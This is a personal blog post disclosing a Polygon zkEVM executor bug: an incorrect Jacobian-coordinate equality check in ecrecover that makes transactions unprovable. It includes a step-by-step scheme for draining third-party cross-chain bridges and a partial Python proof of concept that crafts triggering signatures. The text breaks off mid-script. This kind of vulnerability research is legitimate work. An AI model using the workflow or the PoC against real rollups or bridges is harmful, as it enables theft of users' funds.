<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>Polygon zkEVM Series 2: Executor-Induced Unprovable Transactions | Homepage</title>
    <meta name="generator" content="VuePress 1.9.10">
    <link rel="icon" href="/logo.png">
    <meta name="description" content="Zhiyuan Sun&#39;s personal website">
    
    <link rel="preload" href="/assets/css/0.styles.f21ffe49.css" as="style"><link rel="preload" href="/assets/js/app.0f57a21d.js" as="script"><link rel="preload" href="/assets/js/2.9c3d16e9.js" as="script"><link rel="preload" href="/assets/js/1.ae13b9d5.js" as="script"><link rel="preload" href="/assets/js/30.00564173.js" as="script"><link rel="prefetch" href="/assets/js/10.348fa4ae.js"><link rel="prefetch" href="/assets/js/11.16c60823.js"><link rel="prefetch" href="/assets/js/12.47b93c21.js"><link rel="prefetch" href="/assets/js/13.8eab7d11.js"><link rel="prefetch" href="/assets/js/14.9b92e4b9.js"><link rel="prefetch" href="/assets/js/15.36c13836.js"><link rel="prefetch" href="/assets/js/16.47e1d84d.js"><link rel="prefetch" href="/assets/js/17.86a696ad.js"><link rel="prefetch" href="/assets/js/18.0498bdb0.js"><link rel="prefetch" href="/assets/js/19.a0bcf0af.js"><link rel="prefetch" href="/assets/js/20.38ceeaed.js"><link rel="prefetch" href="/assets/js/21.0f3f7ec3.js"><link rel="prefetch" href="/assets/js/22.fbed27a9.js"><link rel="prefetch" href="/assets/js/23.bff8b7a9.js"><link rel="prefetch" href="/assets/js/24.3ae7893f.js"><link rel="prefetch" href="/assets/js/25.140bb6d9.js"><link rel="prefetch" href="/assets/js/26.e2ff6647.js"><link rel="prefetch" href="/assets/js/27.f8ec3cf9.js"><link rel="prefetch" href="/assets/js/28.8163d402.js"><link rel="prefetch" href="/assets/js/29.66aa740a.js"><link rel="prefetch" href="/assets/js/3.6df97c0a.js"><link rel="prefetch" href="/assets/js/4.ea9d8b6e.js"><link rel="prefetch" href="/assets/js/5.94969ca9.js"><link rel="prefetch" href="/assets/js/6.d433241e.js"><link rel="prefetch" href="/assets/js/7.ab403544.js"><link rel="prefetch" href="/assets/js/vendors~docsearch.b3213737.js">
    <link rel="stylesheet" href="/assets/css/0.styles.f21ffe49.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container no-sidebar"><header class="navbar"><div class="sidebar-button"><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" viewBox="0 0 448 512" class="icon"><path fill="currentColor" d="M436 124H12c-6.627 0-12-5.373-12-12V80c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12z"></path></svg></div> <a href="/" class="home-link router-link-active"><!----> <span class="site-name">Homepage</span></a> <div class="links"><!----> <nav class="nav-links can-hide"><div class="nav-item"><a href="/" class="nav-link">
  Home
</a></div><div class="nav-item"><a href="/blog/" class="nav-link router-link-active">
  Blog
</a></div> <!----></nav></div></header> <div class="sidebar-mask"></div> <aside class="sidebar"><nav class="nav-links"><div class="nav-item"><a href="/" class="nav-link">
  Home
</a></div><div class="nav-item"><a href="/blog/" class="nav-link router-link-active">
  Blog
</a></div> <!----></nav>  <!----> </aside> <main class="page"> <div class="theme-default-content content__default"><h1 id="polygon-zkevm-series-2-executor-induced-unprovable-transactions">Polygon zkEVM Series 2: Executor-Induced Unprovable Transactions</h1> <h2 id="defination">Defination</h2> <p>The executor-induced unprovable transaction vulnerability in zk systems occurs when the state transition produced by the executor (witness calculator) fails to satisfy the constraint system. This is usually caused by a computational error in the executor.</p> <h2 id="exploitation-scenario">Exploitation Scenario</h2> <p>After conducting thorough research, I proposed an attack vector leveraging this vulnerability. This novel exploitation method enables attackers to drain all funds from third-party cross-chain bridges, including Ether and all tokens.</p> <h3 id="key-insight">Key Insight</h3> <p>The necessity of <strong>rolling back the blockchain to recover from the attack</strong> is the core enabler of the double-spend. While the rollback restores L2 balances to their original state, it cannot affect the <strong>GlobalExitRoot</strong> on L1, which holds the leaf nodes added during the attack. This allows the attacker to repeatedly claim illegitimate funds, resulting in significant and unrecoverable losses for third-party cross-chain bridges.</p> <h3 id="detailed-attack-workflow">Detailed Attack Workflow</h3> <p>Assuming the attacker controls account A, the attacked third-party cross-chain bridge account is B, and the official cross-chain bridge account is C, we use subscripts 1 and 2 to represent the same account on L1 and L2. We assume that the initial state of the entire system is as follows:</p> <div class="language- extra-class"><pre class="language-text"><code>balance(A1) = 0 ETH
balance(A2) = 100 ETH
balance(B1) = 500 ETH
balance(B2) = 500 ETH
balance(C1) = 1000 ETH
</code></pre></div><p>Please note that we do not define the balance of account C2, as C2 is essentially a pool account, and defining its balance is meaningless. Based on the above definition, the workflow of this attack can be represented step by step as follows.</p> <p>First, the attacker begins by sending an unprovable transaction, creating a state transition that cannot be proved. Next, the attacker uses the third-party cross-chain bridge to transfer funds from L2 to L1, which requires sending 100 ETH from A2 to B2. After this operation, the state of the whole system is as follows:</p> <div class="language- extra-class"><pre class="language-text"><code>balance(A1) = 0 ETH
balance(A2) = 0 ETH
balance(B1) = 500 ETH
balance(B2) = 600 ETH
balance(C1) = 1000 ETH
</code></pre></div><p>Next, the attacker can redeem the corresponding funds from the third-party cross-chain bridge on L1. After this operation, the state of the whole system is as follows:</p> <div class="language- extra-class"><pre class="language-text"><code>balance(A1) = 100 ETH
balance(A2) = 0 ETH
balance(B1) = 400 ETH
balance(B2) = 600 ETH
balance(C1) = 1000 ETH
</code></pre></div><p>Next, the attacker uses the official cross-chain bridge to transfer funds from L1 back to L2, which requires sending 100 ETH from A1 to C1. A key point here is that this step added a new leaf node in the GlobalExitRoot to send funds to A2. After this operation, the state of the whole system is as follows:</p> <div class="language- extra-class"><pre class="language-text"><code>balance(A1) = 0 ETH
balance(A2) = 0 ETH
balance(B1) = 400 ETH
balance(B2) = 600 ETH
balance(C1) = 1100 ETH
</code></pre></div><p>Next, the attacker can redeem the corresponding funds from the official cross-chain bridge on L2. After this operation, the state of the whole system is as follows:</p> <div class="language- extra-class"><pre class="language-text"><code>balance(A1) = 0 ETH
balance(A2) = 100 ETH
balance(B1) = 400 ETH
balance(B2) = 600 ETH
balance(C1) = 1100 ETH
</code></pre></div><p>After the above series of operations, the attacker's funds moved from L2 to L1 and then back to L2. After this round of operations, 100 ETH funds were added to the system we observed. This is because the funds sent to A2 in the last step were minted by the C2 account. The crucial point here is that after this round of operations, a new leaf node was added to the GlobalExitRoot which can be used to send funds to the attacker's account A2.</p> <p>After the attacker repeats the above operations for 5 rounds, the state of the system is as follows:</p> <div class="language- extra-class"><pre class="language-text"><code>balance(A1) = 0 ETH
balance(A2) = 100 ETH
balance(B1) = 0 ETH
balance(B2) = 1000 ETH
balance(C1) = 1500 ETH
</code></pre></div><p>Since the state transition of the transaction sent in the first step is unprovable, the only way to recover from this attack is to roll back the L2 blockchain. Assuming that the L2 blockchain is rolled back after the attacker conducts 5 rounds of attacks, the state of the system at this time is as follows:</p> <div class="language- extra-class"><pre class="language-text"><code>balance(A1) = 0 ETH
balance(A2) = 100 ETH
balance(B1) = 0 ETH
balance(B2) = 500 ETH
balance(C1) = 1500 ETH
</code></pre></div><p>A rollback of the L2 blockchain means that the balance of all L2 accounts will be restored to their initial state. Consequently, the balance of account B2 decreased from 1000 ETH to 500 ETH, indicating that the third-party cross-chain bridge lost 500 ETH in these 5 rounds of attacks!</p> <p>Furthermore, since each round of the attack will add a new leaf node to GlobalExitRoot that can transfer money to the attacker's account A2, a total of 5 such leaf nodes will be added after 5 rounds of attacks. A key point here is that the GlobalExitRoot is saved in the L1 smart contract and thus is not affected by L2 blockchain rollbacks. Therefore, after the L2 blockchain rollback, the attacker can use the 5 leaf nodes added at GlobalExitRoot to redeem the corresponding funds! After the corresponding funds are transferred to the attacker's account, the state of the entire system is as follows:</p> <div class="language- extra-class"><pre class="language-text"><code>balance(A1) = 0 ETH
balance(A2) = 600 ETH
balance(B1) = 0 ETH
balance(B2) = 500 ETH
balance(C1) = 1500 ETH
</code></pre></div><p>It can be seen that the attacker made illegal profits of 500 ETH! The attacker can repeat the above attack as many times as desired to steal all the funds from all third-party cross-chain bridges! Besides ETH, all types of tokens in third-party cross-chain bridges can be completely stolen by attackers using the aforementioned technique!</p> <h2 id="case-study-miscalculations-of-the-jacobian-coordinate">Case Study: Miscalculations of the Jacobian Coordinate</h2> <p>In forkId5, the executor introduces several performance-enhancing optimizations such as using Jacobian coordinate representation to speed up elliptic curve related calculations. However, due to the complexity of the optimization algorithm, I found a critical vulnerability in it that can lead to incorrect calculations.</p> <p>Specifically, the executor uses the same logic algorithm as in the ROM to calculate the ecrecover function. However, the formula for comparing the equality of the Jacobian coordinates is incorrectly implemented in the executor. The relevant code is shown below.</p> <div class="language-cpp extra-class"><pre class="language-cpp"><code><span class="token keyword">void</span> <span class="token function">generalAddPointEcJacobianZ2Is1</span><span class="token punctuation">(</span><span class="token keyword">const</span> RawFec<span class="token double-colon punctuation">::</span>Element <span class="token operator">&amp;</span>x1<span class="token punctuation">,</span> <span class="token keyword">const</span> RawFec<span class="token double-colon punctuation">::</span>Element <span class="token operator">&amp;</span>y1<span class="token punctuation">,</span> <span class="token keyword">const</span> RawFec<span class="token double-colon punctuation">::</span>Element <span class="token operator">&amp;</span>z1<span class="token punctuation">,</span>
                               <span class="token keyword">const</span> <span class="token keyword">bool</span> p1_empty<span class="token punctuation">,</span>
                               <span class="token keyword">const</span> RawFec<span class="token double-colon punctuation">::</span>Element <span class="token operator">&amp;</span>x2<span class="token punctuation">,</span> <span class="token keyword">const</span> RawFec<span class="token double-colon punctuation">::</span>Element <span class="token operator">&amp;</span>y2<span class="token punctuation">,</span> <span class="token keyword">const</span> RawFec<span class="token double-colon punctuation">::</span>Element <span class="token operator">&amp;</span>z2<span class="token punctuation">,</span>
                               <span class="token keyword">const</span> <span class="token keyword">bool</span> p2_empty<span class="token punctuation">,</span>
                               RawFec<span class="token double-colon punctuation">::</span>Element <span class="token operator">&amp;</span>x3<span class="token punctuation">,</span> RawFec<span class="token double-colon punctuation">::</span>Element <span class="token operator">&amp;</span>y3<span class="token punctuation">,</span> RawFec<span class="token double-colon punctuation">::</span>Element <span class="token operator">&amp;</span>z3<span class="token punctuation">,</span>
                               <span class="token keyword">bool</span> <span class="token operator">&amp;</span>p3_empty<span class="token punctuation">)</span>
<span class="token punctuation">{</span>

    <span class="token keyword">if</span> <span class="token punctuation">(</span>p1_empty <span class="token operator">&amp;&amp;</span> p2_empty<span class="token punctuation">)</span>
    <span class="token punctuation">{</span>
        p3_empty <span class="token operator">=</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">else</span>
    <span class="token punctuation">{</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span>p1_empty<span class="token punctuation">)</span>
        <span class="token punctuation">{</span>
            fec<span class="token punctuation">.</span><span class="token function">copy</span><span class="token punctuation">(</span>x3<span class="token punctuation">,</span> x2<span class="token punctuation">)</span><span class="token punctuation">;</span>
            fec<span class="token punctuation">.</span><span class="token function">copy</span><span class="token punctuation">(</span>y3<span class="token punctuation">,</span> y2<span class="token punctuation">)</span><span class="token punctuation">;</span>
            fec<span class="token punctuation">.</span><span class="token function">copy</span><span class="token punctuation">(</span>z3<span class="token punctuation">,</span> z2<span class="token punctuation">)</span><span class="token punctuation">;</span>
            p3_empty <span class="token operator">=</span> p2_empty<span class="token punctuation">;</span>
            <span class="token keyword">return</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
        <span class="token keyword">else</span>
        <span class="token punctuation">{</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span>p2_empty<span class="token punctuation">)</span>
            <span class="token punctuation">{</span>
                fec<span class="token punctuation">.</span><span class="token function">copy</span><span class="token punctuation">(</span>x3<span class="token punctuation">,</span> x1<span class="token punctuation">)</span><span class="token punctuation">;</span>
                fec<span class="token punctuation">.</span><span class="token function">copy</span><span class="token punctuation">(</span>y3<span class="token punctuation">,</span> y1<span class="token punctuation">)</span><span class="token punctuation">;</span>
                fec<span class="token punctuation">.</span><span class="token function">copy</span><span class="token punctuation">(</span>z3<span class="token punctuation">,</span> z1<span class="token punctuation">)</span><span class="token punctuation">;</span>
                p3_empty <span class="token operator">=</span> p1_empty<span class="token punctuation">;</span>
                <span class="token keyword">return</span><span class="token punctuation">;</span>
            <span class="token punctuation">}</span>
            <span class="token keyword">else</span>
            <span class="token punctuation">{</span>
                <span class="token keyword">if</span> <span class="token punctuation">(</span>fec<span class="token punctuation">.</span><span class="token function">eq</span><span class="token punctuation">(</span>fec<span class="token punctuation">.</span><span class="token function">mul</span><span class="token punctuation">(</span>x1<span class="token punctuation">,</span> z2<span class="token punctuation">)</span><span class="token punctuation">,</span> fec<span class="token punctuation">.</span><span class="token function">mul</span><span class="token punctuation">(</span>x2<span class="token punctuation">,</span> z1<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">)</span>
                <span class="token punctuation">{</span>
                    <span class="token function">addPointEcJacobianZ2Is1</span><span class="token punctuation">(</span>x1<span class="token punctuation">,</span> y1<span class="token punctuation">,</span> z1<span class="token punctuation">,</span> x2<span class="token punctuation">,</span> y2<span class="token punctuation">,</span> z2<span class="token punctuation">,</span> x3<span class="token punctuation">,</span> y3<span class="token punctuation">,</span> z3<span class="token punctuation">)</span><span class="token punctuation">;</span>
                    <span class="token keyword">if</span> <span class="token punctuation">(</span>fec<span class="token punctuation">.</span><span class="token function">isZero</span><span class="token punctuation">(</span>z3<span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">1</span><span class="token punctuation">)</span>
                    <span class="token punctuation">{</span>
                        p3_empty <span class="token operator">=</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
                    <span class="token punctuation">}</span>
                    <span class="token keyword">else</span>
                    <span class="token punctuation">{</span>
                        p3_empty <span class="token operator">=</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
                    <span class="token punctuation">}</span>
                <span class="token punctuation">}</span>
                <span class="token keyword">else</span>
                <span class="token punctuation">{</span>
                    <span class="token keyword">if</span> <span class="token punctuation">(</span>fec<span class="token punctuation">.</span><span class="token function">eq</span><span class="token punctuation">(</span>fec<span class="token punctuation">.</span><span class="token function">mul</span><span class="token punctuation">(</span>y1<span class="token punctuation">,</span> z2<span class="token punctuation">)</span><span class="token punctuation">,</span> fec<span class="token punctuation">.</span><span class="token function">mul</span><span class="token punctuation">(</span>y2<span class="token punctuation">,</span> z1<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">)</span>
                    <span class="token punctuation">{</span>
                        p3_empty <span class="token operator">=</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
                    <span class="token punctuation">}</span>
                    <span class="token keyword">else</span>
                    <span class="token punctuation">{</span>
                        <span class="token function">dblPointEcJacobianZ2Is1</span><span class="token punctuation">(</span>x1<span class="token punctuation">,</span> y1<span class="token punctuation">,</span> z1<span class="token punctuation">,</span> x3<span class="token punctuation">,</span> y3<span class="token punctuation">,</span> z3<span class="token punctuation">)</span><span class="token punctuation">;</span>
                        <span class="token keyword">if</span> <span class="token punctuation">(</span>fec<span class="token punctuation">.</span><span class="token function">isZero</span><span class="token punctuation">(</span>z3<span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">1</span><span class="token punctuation">)</span>
                        <span class="token punctuation">{</span>
                            p3_empty <span class="token operator">=</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
                        <span class="token punctuation">}</span>
                        <span class="token keyword">else</span>
                        <span class="token punctuation">{</span>
                            p3_empty <span class="token operator">=</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
                        <span class="token punctuation">}</span>
                    <span class="token punctuation">}</span>
                <span class="token punctuation">}</span>
            <span class="token punctuation">}</span>
        <span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre></div><p>The key point is the following line:</p> <div class="language-cpp extra-class"><pre class="language-cpp"><code><span class="token keyword">if</span> <span class="token punctuation">(</span>fec<span class="token punctuation">.</span><span class="token function">eq</span><span class="token punctuation">(</span>fec<span class="token punctuation">.</span><span class="token function">mul</span><span class="token punctuation">(</span>x1<span class="token punctuation">,</span> z2<span class="token punctuation">)</span><span class="token punctuation">,</span> fec<span class="token punctuation">.</span><span class="token function">mul</span><span class="token punctuation">(</span>x2<span class="token punctuation">,</span> z1<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">)</span>
</code></pre></div><p>This line of code tries to check if two points in the Jacobian coordinate system have the same X coordinate. However, the formula <code>x1 * z2 == x2 * z1</code> used here is incorrect. The correct formula should be as follows:</p> <div class="language- extra-class"><pre class="language-text"><code>x1 * z2 ^ 2 == x2 * z1 ^ 2
</code></pre></div><p>To trigger this bug, the attacker need to craft a signature value such that during one of the calculations in the scalar multiplication operation, the point added to p3 has the same coordinates as p3. This would cause calculations that should be done by the doubling point formula to incorrectly use the point addition formula. Therefore, this will result in the final calculated Ethereum address being incorrect.</p> <p>This vulnerability was reported to Polygon zkEVM in <span style="color:blue;">August 2023</span> and confirmed as <span style="color:red;">critical severity</span>.</p> <h2 id="proof-of-concept">Proof of Concept</h2> <p>I use the following code to test this vulnerability. You can easily find the bug by comparing the output of the <code>calculate</code> function of the following Python code with the output of the executor.</p> <div class="language-python extra-class"><pre class="language-python"><code><span class="token keyword">from</span> ecdsa <span class="token keyword">import</span> SigningKey<span class="token punctuation">,</span> SECP256k1
<span class="token keyword">from</span> ecdsa<span class="token punctuation">.</span>keys <span class="token keyword">import</span> _truncate_and_convert_digest
<span class="token keyword">from</span> web3 <span class="token keyword">import</span> Web3
<span class="token keyword">from</span> eth_account<span class="token punctuation">.</span>_utils<span class="token punctuation">.</span>legacy_transactions <span class="token keyword">import</span> encode_transaction<span class="token punctuation">,</span> serializable_unsigned_transaction_from_dict
<span class="token keyword">from</span> hexbytes <span class="token keyword">import</span> HexBytes
<span class="token keyword">from</span> binascii <span class="token keyword">import</span> unhexlify
<span class="token keyword">from</span> ecdsa<span class="token punctuation">.</span>ellipticcurve <span class="token keyword">import</span> INFINITY
<span class="token keyword">from</span> ecdsa<span class="token punctuation">.</span>ecdsa <span class="token keyword">import</span> generator_secp256k1
<span class="token keyword">from</span> Crypto<span class="token punctuation">.</span>Hash <span class="token keyword">import</span> keccak

<span class="token keyword">def</span> <span class="token function">ec_point_to_address</span><span class="token punctuation">(</span>x<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">,</span> y<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">&gt;</span> <span class="token builtin">str</span><span class="token punctuation">:</span>
    public_key <span class="token operator">=</span> x<span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">32</span><span class="token punctuation">,</span> <span class="token string">'big'</span><span class="token punctuation">)</span> <span class="token operator">+</span> y<span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">32</span><span class="token punctuation">,</span> <span class="token string">'big'</span><span class="token punctuation">)</span>
    k <span class="token operator">=</span> keccak<span class="token punctuation">.</span>new<span class="token punctuation">(</span>digest_bits<span class="token operator">=</span><span class="token number">256</span><span class="token punctuation">)</span>
    k<span class="token punctuation">.</span>update<span class="token punctuation">(</span>public_key<span class="token punctuation">)</span>
    address <span class="token operator">=</span> k<span class="token punctuation">.</span>hexdigest<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">40</span><span class="token punctuation">:</span><span class="token punctuation">]</span>
    <span class="token keyword">return</span> <span class="token string">&quot;0x&quot;</span> <span class="token operator">+</span> address

<span class="token keyword">def</span> <span class="token function">get_bits</span><span class="token punctuation">(</span>n<span class="token punctuation">)</span><span class="token punctuation">:</span>
    binary_str <span class="token operator">=</span> <span class="token builtin">bin</span><span class="token punctuation">(</span>n<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token punctuation">]</span>
    <span class="token keyword">while</span> <span class="token builtin">len</span><span class="token punctuation">(</span>binary_str<span class="token punctuation">)</span> <span class="token operator">&lt;</span> <span class="token number">256</span><span class="token punctuation">:</span>
        binary_str <span class="token operator">=</span> <span class="token string">&quot;0&quot;</span> <span class="token operator">+</span> binary_str
    <span class="token keyword">return</span> binary_str


<span class="token keyword">def</span> <span class="token function">calculate</span><span class="token punctuation">(</span>scalar1<span class="token punctuation">,</span> scalar2<span class="token punctuation">,</span> k<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;-----------&quot;</span><span class="token punctuation">)</span>
    P <span class="token operator">=</span> k <span class="token operator">*</span> generator_secp256k1

    result <span class="token operator">=</span> <span class="token boolean">None</span>
    scalar1_bits <span class="token operator">=</span> get_bits<span class="token punctuation">(</span>scalar1<span class="token punctuation">)</span>
    scalar2_bits <span class="token operator">=</span> get_bits<span class="token punctuation">(</span>scalar2<span class="token punctuation">)</span>
    <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">256</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        current_scalar1_bit <span class="token operator">=</span> scalar1_bits<span class="token punctuation">[</span>i<span class="token punctuation">]</span>
        current_scalar2_bit <span class="token operator">=</span> scalar2_bits<span class="token punctuation">[</span>i<span class="token punctuation">]</span>
        current_point <span class="token operator">=</span> <span class="token boolean">None</span>

        <span class="token keyword">if</span> current_scalar1_bit <span class="token operator">==</span> <span class="token string">'1'</span><span class="token punctuation">:</span>
            current_point <span class="token operator">=</span> generator_secp256k1
            <span class="token keyword">if</span> current_scalar2_bit <span class="token operator">==</span> <span class="token string">'1'</span><span class="token punctuation">:</span>
                current_point <span class="token operator">=</span> generator_secp256k1 <span class="token operator">+</span> P
        <span class="token keyword">elif</span> current_scalar2_bit <span class="token operator">==</span> <span class="token string">'1'</span><span class="token punctuation">:</span>
            current_point <span class="token operator">=</span> P
            <span class="token keyword">if</span> current_scalar1_bit <span class="token operator">==</span> <span class="token string">'1'</span><span class="token punctuation">:</span>
                current_point <span class="token operator">=</span> generator_secp256k1 <span class="token operator">+</span> P
    
        <span class="token keyword">if</span> current_point <span class="token operator">!=</span> <span class="token boolean">None</span><span class="token punctuation">:</span>
            <span class="token keyword">if</span> result <span class="token operator">==</span> <span class="token boolean">None</span><span class="token punctuation">:</span>
                result <span class="token operator">=</span> current_point
            <span class="token keyword">else</span><span class="token punctuation">:</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;-----------&quot;</span><span class="token punctuation">)</span>
                tmp <span class="token operator">=</span> result
                result <span class="token operator">=</span> result <span class="token operator">+</span> current_point
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;Add&quot;</span><span class="token punctuation">)</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span>tmp<span class="token punctuation">.</span>get_coords<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span>current_point<span class="token punctuation">.</span>get_coords<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span>result<span class="token punctuation">.</span>get_coords<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;-----------&quot;</span><span class="token punctuation">)</span>
        <span class="token keyword">if</span> i <span class="token operator">!=</span> <span class="token number">255</span> <span class="token keyword">and</span> result <span class="token operator">!=</span> <span class="token boolean">None</span><span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;-----------&quot;</span><span class="token punctuation">)</span>
            tmp <span class="token operator">=</span> result
            result <span class="token operator">=</span> result <span class="token operator">*</span> <span class="token number">2</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;Double&quot;</span><span class="token punctuation">)</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span>tmp<span class="token punctuation">.</span>get_coords<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span>result<span class="token punctuation">.</span>get_coords<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;-----------&quot;</span><span class="token punctuation">)</span>
    
    
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;-----------&quot;</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>result<span class="token punctuation">.</span>get_coords<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    affineP <span class="token operator">=</span> result<span class="token punctuation">.</span>to_affine<span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>affineP<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>ec_point_to_address<span class="token punctuation">(</span>affineP<span class="token punctuation">.</span>x<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> affineP<span class="token punctuation">.</span>y<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> result

<span class="token keyword">def</span> <span class="token function">get_leading_bits</span><span class="token punctuation">(</span>n<span class="token punctuation">)</span><span class="token punctuation">:</span>
    binary_str <span class="token operator">=</span> <span class="token builtin">bin</span><span class="token punctuation">(</span>n<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token punctuation">]</span>
    <span class="token keyword">while</span> <span class="token builtin">len</span><span class="token punctuation">(</span>binary_str<span class="token punctuation">)</span> <span class="token operator">&lt;</span> <span class="token number">256</span><span class="token punctuation">:</span>
        binary_str <span class="token operator">=</span> <span class="token string">&quot;0&quot;</span> <span class="token operator">+</span> binary_str
    <span class="token keyword">return</span> binary_str<span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token number">2</span><span class="token punctuation">]</span>


<span class="token keyword">def</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    private_key_bytes <span class="token operator">=</span> unhexlify<span class="token punctuation">(</span><span class="token string">&quot;ac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&quot;</span><span class="token punctuation">)</span>
    private_key <span class="token operator">=</span> SigningKey<span class="token punctuation">.</span>from_string<span class="token punctuation">(</span>
        private_key_bytes<span class="token punctuation">,</span>
        curve<span class="token operator">=</span>SECP256k1
    <span class="token punctuation">)</span>
    <span class="token comment">#w3 = Web3(Web3.HTTPProvider('http://127.0.0.1:8123'))</span>
    <span class="token comment">#from_address = w3.eth.account.from_key(private_key.to_string().hex()).address</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;from_address: &quot;</span><span class="token punctuation">,</span> <span class="token string">&quot;0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266&quot;</span><span class="token punctuation">)</span>

    value <span class="token operator">=</span> <span class="token number">0</span>
    <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>
            transaction_dict <span class="token operator">=</span> <span class="token punctuation">{</span>
                <span class="token string">'to'</span><span class="token punctuation">:</span> <span class="token string">'0x0000000000000000000000000000000000001234'</span><span class="token punctuation">,</span>
                <span class="token string">'value'</span><span class="token punctuation">:</span> value<span class="token punctuation">,</span>
                <span class="token string">'gas'</span><span class="token punctuation">:</span> <span class="token number">21000</span><span class="token punctuation">,</span>
                <span class="token string">'gasPrice'</span><span class="token punctuation">:</span> <span class="token number">20000000000</span><span class="token punctuation">,</span>
                <span class="token string">'nonce'</span><span class="token punctuation">:</span> <span class="token number">8</span><span class="token punctuation">,</span>
            <span class="token punctuation">}</span>
            unsigned_transaction <span class="token operator">=</span> serializable_unsigned_transaction_from_dict<span class="token punctuation">(</span>transaction_dict<span class="token punctuation">)</span>
            transaction_number <span class="token operator">=</span> _truncate_and_convert_digest<span class="token punctuation">(</span>unsigned_transaction<span class="token punctuation">.</span><span class="token builtin">hash</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> SECP256k1<span class="token punctuation">,</span> <span class="token boolean">False</span><span class="token punctuation">)</span>
            
            k <span class="token operator">=</span> <span class="token number">2</span>
            sig <span class="token operator">=</span> private_key<span class="token punctuation">.</span>privkey<span class="token punctuation">.</span>sign<span class="token punctuation">(</span>transaction_number<span class="token punctuation">,</span> k<span class="token punctuation">)</span>
            v <span class="token operator">=</span> <span class="token number">27</span>
            inverse_r <span class="token operator">=</span> <span class="token builtin">pow</span><span class="token punctuation">(</span>sig<span class="token punctuation">.</span>r<span class="token punctuation">,</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">,</span> SECP256k1<span class="token punctuation">.</span>order<span class="token punctuation">)</span>

